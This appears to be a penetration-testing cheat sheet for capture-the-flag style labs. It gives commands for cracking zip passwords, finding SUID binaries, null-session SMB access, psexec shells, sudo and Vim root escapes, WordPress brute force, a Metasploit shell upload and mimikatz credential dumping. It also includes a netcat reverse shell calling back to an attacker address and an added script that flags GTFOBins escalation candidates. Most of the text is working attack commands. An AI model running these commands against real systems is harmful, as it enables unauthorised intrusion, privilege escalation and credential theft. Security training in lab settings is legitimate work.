1. Crack the password of a zip archive
zip2john backup.zip > passwd.txt
john passwd.txt
2. Find
- Find files with the SUID bit set
find / -perm -u=s 2>/dev/null
If one turns up, check GTFOBins (https://gtfobins.github.io/) to see whether that binary can be abused for privilege escalation.
- Find files owned by a particular group
find / -type f -group bugtracker 2>/dev/null
- Find a file by name
# linux
find / -name "user.txt" 2>/dev/null
# powershell (search from the drive root, silence access-denied errors)
Get-ChildItem -Path C:\ -Recurse -Filter user.txt -ErrorAction SilentlyContinue
3. SMB
If port 445 is open on the target, list the shares with a null session (no credentials):
smbclient -N -L //10.10.10.27
then connect to a share and download files from it:
smbclient -N //10.10.10.27/backup
get filename
Once a username and password are known, get a shell with Impacket's psexec (it prompts for the password):
python3 psexec.py administrator@10.10.10.27
4. Upgrade the shell to a full TTY
SHELL=/bin/bash script -q /dev/null
# or
python3 -c "import pty;pty.spawn('/bin/bash')"
5. sudo
List the commands the current user may run with sudo:
sudo -l
If an interactive program such as vim can be run with sudo, use it to spawn a shell as root instead of looking for an exploit. For example, from inside Vim:
:!/bin/bash
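The two checks above (SUID binaries in section 2, `sudo -l` rules here) both end with "look it up on GTFOBins". The script below, added here as an example and not part of the original notes, automates that triage: it lists SUID files under a root, parses `sudo -l` output into one rule per line, and flags entries whose basename appears in a small hand-copied subset of GTFOBins. The `GTFOBINS_SUID` / `GTFOBINS_SUDO` lists and the `SAMPLE_SUDO_L` text are assumptions constructed for the demo, not the full GTFOBins catalogue or output captured from any real host.

```shell
#!/usr/bin/env bash
# Added example, not part of the original notes: triage SUID binaries and
# "sudo -l" rules against a small subset of GTFOBins entries.
# GTFOBINS_SUID and GTFOBINS_SUDO are assumptions: a handful of well-known
# entries copied by hand, not the full catalogue at https://gtfobins.github.io/.
set -u

GTFOBINS_SUID="bash find vim nmap python python3 perl env cp awk"
GTFOBINS_SUDO="bash find vim nmap python python3 perl env cp awk less more tar"

# in_list WORD LIST: succeed if WORD is one of the space-separated LIST items.
in_list() {
  case " $2 " in
    *" $1 "*) return 0 ;;
    *) return 1 ;;
  esac
}

# find_suid [ROOT]: list SUID files under ROOT (default /), one path per line.
# -perm -4000 is the same test as -perm -u=s; -type f skips directories.
find_suid() {
  find "${1:-/}" -type f -perm -4000 2>/dev/null
}

# flag_suid: filter paths on stdin, keeping those whose basename has a
# GTFOBins SUID entry in the subset above.
flag_suid() {
  local p b
  while IFS= read -r p; do
    b=$(basename "$p")
    if in_list "$b" "$GTFOBINS_SUID"; then
      printf '%s\n' "$p"
    fi
  done
}

# parse_sudo_l: read "sudo -l" output on stdin and print one "runas|command"
# line per rule. Rule lines follow the "may run the following commands"
# header and look like
#     (root) NOPASSWD: /usr/bin/find
#     (root) /usr/bin/vim, /bin/ls
parse_sudo_l() {
  awk '
    /may run the following commands/ { rules = 1; next }
    rules && /^[ \t]*\(/ {
      line = $0
      sub(/^[ \t]+/, "", line)
      runas = line
      sub(/\).*/, "", runas)
      sub(/^\(/, "", runas)
      cmds = line
      sub(/^[^)]*\)[ \t]*/, "", cmds)
      # strip any number of tag prefixes such as NOPASSWD: or SETENV:
      while (sub(/^(NOPASSWD|PASSWD|SETENV|NOSETENV|EXEC|NOEXEC):[ \t]*/, "", cmds)) { }
      n = split(cmds, parts, /,[ \t]*/)
      for (i = 1; i <= n; i++) print runas "|" parts[i]
    }'
}

# flag_sudo: read "runas|command" lines and print those worth a GTFOBins
# lookup: ALL, or a command whose basename is in the sudo subset above.
flag_sudo() {
  local runas cmd b
  while IFS='|' read -r runas cmd; do
    if [ "$cmd" = "ALL" ]; then
      printf '%s|%s|%s\n' "$runas" "$cmd" "any command, e.g. sudo /bin/bash"
    else
      b=$(basename "${cmd%% *}")   # drop arguments before taking the basename
      if in_list "$b" "$GTFOBINS_SUDO"; then
        printf '%s|%s|%s\n' "$runas" "$cmd" "see GTFOBins sudo entry for $b"
      fi
    fi
  done
}

# Constructed "sudo -l" output for the demo; not captured from a real host.
SAMPLE_SUDO_L='Matching Defaults entries for alice on box:
    env_reset, mail_badpass

User alice may run the following commands on box:
    (root) NOPASSWD: /usr/bin/find
    (root) /usr/bin/vim, /bin/ls
    (bob) NOPASSWD: /usr/bin/less'

# Demo: triage the sample rules, then SUID files under /usr/bin (or under
# the root given as the first argument).
echo "== sudo rules worth a GTFOBins lookup =="
printf '%s\n' "$SAMPLE_SUDO_L" | parse_sudo_l | flag_sudo
echo "== SUID binaries with a GTFOBins entry under ${1:-/usr/bin} =="
find_suid "${1:-/usr/bin}" | flag_suid
```

On a real target, replace the sample with `sudo -l | parse_sudo_l | flag_sudo` and run `find_suid / | flag_suid`; anything it prints is a lookup, not a guaranteed escalation, because GTFOBins entries depend on the binary's version and on how the sudo rule restricts arguments.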
6. Web
Enumerate directories:
gobuster dir -u http://10.10.10.29 -w /usr/share/wordlists/dirb/big.txt
Scan for known issues and misconfigurations:
nikto -host http://10.10.10.28 -o _28.html
WordPress
Enumerate (users, plugins, themes), then brute-force passwords against the user list:
wpscan --url http://10.10.10.29/wordpress --enumerate
wpscan --url http://10.10.10.29/wordpress -U users.txt -P backupPasswords
or, with valid admin credentials, upload a shell through Metasploit:
use exploit/unix/webapp/wp_admin_shell_upload
Netcat
Reverse shell from the target (Windows) back to the attacker (needs an nc build that supports -e):
nc.exe -e cmd.exe 10.10.16.4 7777
Listener on the attacker; the port must match the one the reverse shell connects to:
nc -lvnp 7777
Dump cached credentials (Windows)
.\mimikatz.exe